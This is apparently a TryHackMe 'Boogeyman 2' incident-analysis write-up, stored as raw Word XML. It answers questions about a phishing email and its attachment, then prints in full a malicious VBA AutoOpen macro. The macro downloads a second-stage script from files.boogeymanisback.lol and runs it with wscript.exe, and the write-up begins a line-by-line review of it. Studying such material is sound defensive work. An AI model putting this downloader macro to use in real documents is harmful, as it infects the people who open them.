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E80F" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Boogeyman 2 TryHackMe Analysis Report</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:p>
    <w:p w14:paraId="2B3B8029" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:instrText>HYPERLINK "https://medium.com/@josephalan17201972?source=post_page---byline--e3c847479b91---------------------------------------"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B07059" w14:textId="3B31DCF7" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C240716" wp14:editId="1B4EDAF0">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="222008851" name="Picture 24" descr="Joseph Alan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Joseph Alan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DCCD" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D6F79" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B87EF6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Joseph Alan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C5A6E57" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:t>Follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7447E355" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:t>4 min read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E92B05" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:t>·</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00240B1A" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:t>Nov 2, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CAA556" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:t>34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56359342" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:instrText>HYPERLINK "https://medium.com/plans?dimension=post_audio_button&amp;postId=e3c847479b91&amp;source=upgrade_membership---post_audio_button-----------------------------------------"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F29F9" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDA1BA9" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363F2F1" w14:textId="4BE78CF4" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D309794" wp14:editId="7366DADF">
            <wp:extent cx="5731510" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14154763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EB81" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1 — Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333699B1" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B2EF5F" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Before continuing, deploy the attached machine by clicking the Start Machine button in the upper-right-hand corner of the task. It may take up to 3–5 minutes to initialise the services.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B87EF6"/>
    </w:p>
    <w:p w14:paraId="7B95E1B4" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:t>The machine will start in a split-screen view. If the VM is not visible, use the blue </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Show Split View</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:t> button at the top-right of the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4000C08F" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E805B0" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>For the analysis, you will be provided with the following artifacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F25AE" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>Copy of the phishing email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC537AF" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>memory image of the target’s workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF62C9B" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>You may find these files in the /home/ubuntu/Desktop/artifacts directory.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B87EF6"/>
    </w:p>
    <w:p w14:paraId="511A3636" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 2 Spear Phishing Human Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759E91DA" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 1.What email was utilized to send the phishing email?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4E4909" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00B87EF6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>westaylor23@outlook.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5954CD63" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 2.What is the email of the target employee?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2558371E" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00B87EF6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>maxine.beck@quicklogisticsorg.onmicrosoft.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44473FCE" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 3. What is the name of the attached suspicious document?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67ADBB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Resume_WesleyTaylor.doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080CE5A" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5879306E" w14:textId="065DDC8B" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C33F8A2" wp14:editId="26F0FE70">
            <wp:extent cx="5731510" cy="2803525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19363686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CEB8" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saving the attached document —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E2BC2" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C16CD3" w14:textId="4FDB97FB" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00D6400A" wp14:editId="2E8C1A59">
            <wp:extent cx="5731510" cy="2809875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="10721101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88BC" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 4. What is the MD5 hash of the suspicious attachment?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052262FA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52c4384a0b9e248b95804352ebec6c5b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133BB9A9" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E3BA4" w14:textId="2DA8520B" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3663634D" wp14:editId="5A273851">
            <wp:extent cx="5731510" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11147167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0C12" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 5. What URL is utilized to retrieve the second-stage payload based on the document’s macro?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02F45D" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00B87EF6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02658E39" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 6. What is the name of the process that launched the newly retrieved second-stage payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0DCCB2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wscript.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65726DAE" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 7. What is the full file path of the suspicious second-stage payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E692B3" w14:textId="576BA0C2" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DE54623" wp14:editId="197277D3">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="676306831" name="Rectangle 19" descr="Write on Mediu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D6386" id="Rectangle 19" o:spid="_x0000_s1026" alt="Write on Medium" href="https://medium.com/write?source=promotion_paragraph---post_body_banner_home_for_stories_blocks--e3c847479b91--------------------------------------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596E087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C:\ProgramData\update.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78306C7D" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:t>Sub AutoOpen()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>spath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> = "C:\ProgramData\"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>xHttp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve">: Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>xHttp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>Microsoft.XMLHTTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>bStrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve">: Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>bStrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>Adodb.Stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>xHttp.Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> "GET", "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png", False</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>xHttp.Send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>bStrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t xml:space="preserve">    .Type = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t xml:space="preserve">    .Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t xml:space="preserve">    .write </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>xHttp.responseBody</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t xml:space="preserve">    .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>savetofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>spath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> &amp; "\update.js", 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t>End With</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>shell_object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>WScript.Shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>shell_object.Exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> ("wscript.exe C:\ProgramData\update.js")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:br/>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BEE241" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Macro Code Review —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FAD8B7" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>spath = "C:\ProgramData": This sets the variable spath to the path "C:\ProgramData". It seems like this is the destination directory for the retrieved file.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6"/>
    </w:p>
    <w:p w14:paraId="0758BD20" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP"): This creates an instance of the XMLHTTP object, which is commonly utilized for sending HTTP requests in VBA.</w:t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spellStart"/>
      <w:proofErr w:type="gram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gram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r w:rsidRPr="00B87EF6"/>
    </w:p>
    <w:p w14:paraId="725C2387" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dim bStrm: Set bStrm = CreateObject("Adodb.Stream"): This creates an instance of the ADODB.Stream object, which is utilized for working with binary data.</w:t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spellStart"/>
      <w:proofErr w:type="gram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gram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r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6"/>
    </w:p>
